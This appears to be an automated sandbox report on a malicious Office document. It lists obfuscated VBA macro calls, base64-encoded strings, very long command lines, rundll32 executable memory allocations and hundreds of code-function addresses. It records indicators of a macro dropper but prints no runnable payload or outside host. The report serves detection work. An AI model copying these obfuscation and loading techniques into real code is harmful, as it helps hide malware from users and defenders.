Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")	Name: G8xesq0b8jlsfrsp
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")	Name: Jlda77h_v8nx5
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")	Name: Hrs2a1p95u19
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")	Name: Hrs2a1p95u19

Document contains an embedded VBA with base64 encoded strings

Show sources

Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
Source: VBA code instrumentation	OLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE

Very long command line found

Show sources

Source: unknown	Process created: Commandline size = 5709
Source: unknown	Process created: Commandline size = 5613
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 5613	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Vzmpbxrgkn\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000976F	7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023B41F	7_2_0023B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00232C63	7_2_00232C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00243895	7_2_00243895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023C0C6	7_2_0023C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023EE78	7_2_0023EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023568E	7_2_0023568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002402C3	7_2_002402C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002442DA	7_2_002442DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00238736	7_2_00238736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00237B63	7_2_00237B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00244B41	7_2_00244B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024340A	7_2_0024340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024687F	7_2_0024687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023F444	7_2_0023F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023E05A	7_2_0023E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024A0AF	7_2_0024A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002380BA	7_2_002380BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002360B9	7_2_002360B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002348BD	7_2_002348BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024889D	7_2_0024889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002388E5	7_2_002388E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00231CFA	7_2_00231CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002420C5	7_2_002420C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023F536	7_2_0023F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00240D33	7_2_00240D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023153C	7_2_0023153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247D03	7_2_00247D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023B112	7_2_0023B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00248D1C	7_2_00248D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00245D1D	7_2_00245D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024511B	7_2_0024511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002369A0	7_2_002369A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002461B8	7_2_002461B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00246DB9	7_2_00246DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00249586	7_2_00249586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023F98C	7_2_0023F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00237998	7_2_00237998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00236D9F	7_2_00236D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002431E2	7_2_002431E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002471EF	7_2_002471EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00232A30	7_2_00232A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00239A37	7_2_00239A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00234A35	7_2_00234A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247A0F	7_2_00247A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00245A61	7_2_00245A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023EA4C	7_2_0023EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002362A3	7_2_002362A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00231280	7_2_00231280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002412E2	7_2_002412E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002426F5	7_2_002426F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002396CD	7_2_002396CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00248ADC	7_2_00248ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023BB3A	7_2_0023BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00240F0C	7_2_00240F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242B16	7_2_00242B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00247F1F	7_2_00247F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023C769	7_2_0023C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00240B68	7_2_00240B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023E377	7_2_0023E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00241773	7_2_00241773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00235B79	7_2_00235B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00238F78	7_2_00238F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00249B45	7_2_00249B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242349	7_2_00242349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00248F49	7_2_00248F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00236754	7_2_00236754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023B75F	7_2_0023B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002473AC	7_2_002473AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002317AC	7_2_002317AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024878F	7_2_0024878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023839D	7_2_0023839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00243FE7	7_2_00243FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0023D7EB	7_2_0023D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002467E9	7_2_002467E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002463C1	7_2_002463C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00241BDF	7_2_00241BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00239FDC	7_2_00239FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B41F	8_2_0032B41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032EE78	8_2_0032EE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00322C63	8_2_00322C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00333895	8_2_00333895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032568E	8_2_0032568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003342DA	8_2_003342DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003302C3	8_2_003302C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C0C6	8_2_0032C0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00328736	8_2_00328736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00327B63	8_2_00327B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00334B41	8_2_00334B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003363C1	8_2_003363C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00322A30	8_2_00322A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00329A37	8_2_00329A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00324A35	8_2_00324A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033340A	8_2_0033340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337A0F	8_2_00337A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033687F	8_2_0033687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00335A61	8_2_00335A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032E05A	8_2_0032E05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F444	8_2_0032F444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032EA4C	8_2_0032EA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003280BA	8_2_003280BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003260B9	8_2_003260B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003248BD	8_2_003248BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003262A3	8_2_003262A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033A0AF	8_2_0033A0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033889D	8_2_0033889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00321280	8_2_00321280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003326F5	8_2_003326F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00321CFA	8_2_00321CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003312E2	8_2_003312E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003288E5	8_2_003288E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338ADC	8_2_00338ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003320C5	8_2_003320C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003296CD	8_2_003296CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330D33	8_2_00330D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F536	8_2_0032F536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032BB3A	8_2_0032BB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032153C	8_2_0032153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B112	8_2_0032B112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00332B16	8_2_00332B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033511B	8_2_0033511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337F1F	8_2_00337F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00335D1D	8_2_00335D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338D1C	8_2_00338D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00337D03	8_2_00337D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330F0C	8_2_00330F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00331773	8_2_00331773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032E377	8_2_0032E377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00328F78	8_2_00328F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00325B79	8_2_00325B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032C769	8_2_0032C769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00330B68	8_2_00330B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00326754	8_2_00326754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032B75F	8_2_0032B75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00339B45	8_2_00339B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00332349	8_2_00332349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00338F49	8_2_00338F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00336DB9	8_2_00336DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003361B8	8_2_003361B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003269A0	8_2_003269A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003217AC	8_2_003217AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003373AC	8_2_003373AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00327998	8_2_00327998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00326D9F	8_2_00326D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032839D	8_2_0032839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00339586	8_2_00339586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0033878F	8_2_0033878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032F98C	8_2_0032F98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003331E2	8_2_003331E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00333FE7	8_2_00333FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0032D7EB	8_2_0032D7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003367E9	8_2_003367E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_003371EF	8_2_003371EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00331BDF	8_2_00331BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00329FDC	8_2_00329FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DB41F	9_2_001DB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DEE78	9_2_001DEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2C63	9_2_001D2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E3895	9_2_001E3895
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D568E	9_2_001D568E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E42DA	9_2_001E42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DC0C6	9_2_001DC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E02C3	9_2_001E02C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8736	9_2_001D8736
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E4B41	9_2_001E4B41
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7B63	9_2_001D7B63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E63C1	9_2_001E63C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E7A0F	9_2_001E7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E340A	9_2_001E340A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D4A35	9_2_001D4A35
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D9A37	9_2_001D9A37
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D2A30	9_2_001D2A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DE05A	9_2_001DE05A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DEA4C	9_2_001DEA4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DF444	9_2_001DF444
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E687F	9_2_001E687F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E5A61	9_2_001E5A61
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E889D	9_2_001E889D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D1280	9_2_001D1280
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D48BD	9_2_001D48BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D60B9	9_2_001D60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D80BA	9_2_001D80BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001EA0AF	9_2_001EA0AF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D62A3	9_2_001D62A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E8ADC	9_2_001E8ADC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D96CD	9_2_001D96CD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E20C5	9_2_001E20C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D1CFA	9_2_001D1CFA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E26F5	9_2_001E26F5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D88E5	9_2_001D88E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E12E2	9_2_001E12E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E7F1F	9_2_001E7F1F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E8D1C	9_2_001E8D1C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E5D1D	9_2_001E5D1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E511B	9_2_001E511B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E2B16	9_2_001E2B16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DB112	9_2_001DB112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E0F0C	9_2_001E0F0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E7D03	9_2_001E7D03
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D153C	9_2_001D153C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DBB3A	9_2_001DBB3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DF536	9_2_001DF536
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E0D33	9_2_001E0D33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DB75F	9_2_001DB75F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D6754	9_2_001D6754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E2349	9_2_001E2349
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E8F49	9_2_001E8F49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E9B45	9_2_001E9B45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D5B79	9_2_001D5B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D8F78	9_2_001D8F78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DE377	9_2_001DE377
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E1773	9_2_001E1773
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DC769	9_2_001DC769
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E0B68	9_2_001E0B68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D839D	9_2_001D839D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D6D9F	9_2_001D6D9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D7998	9_2_001D7998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E878F	9_2_001E878F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DF98C	9_2_001DF98C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E9586	9_2_001E9586
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E61B8	9_2_001E61B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E6DB9	9_2_001E6DB9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D17AC	9_2_001D17AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E73AC	9_2_001E73AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D69A0	9_2_001D69A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E1BDF	9_2_001E1BDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D9FDC	9_2_001D9FDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E71EF	9_2_001E71EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001DD7EB	9_2_001DD7EB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E67E9	9_2_001E67E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E3FE7	9_2_001E3FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E31E2	9_2_001E31E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EEE78	10_2_007EEE78
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007E2C63	10_2_007E2C63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EB41F	10_2_007EB41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F42DA	10_2_007F42DA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007EC0C6	10_2_007EC0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_007F02C3	10_2_007F02C3
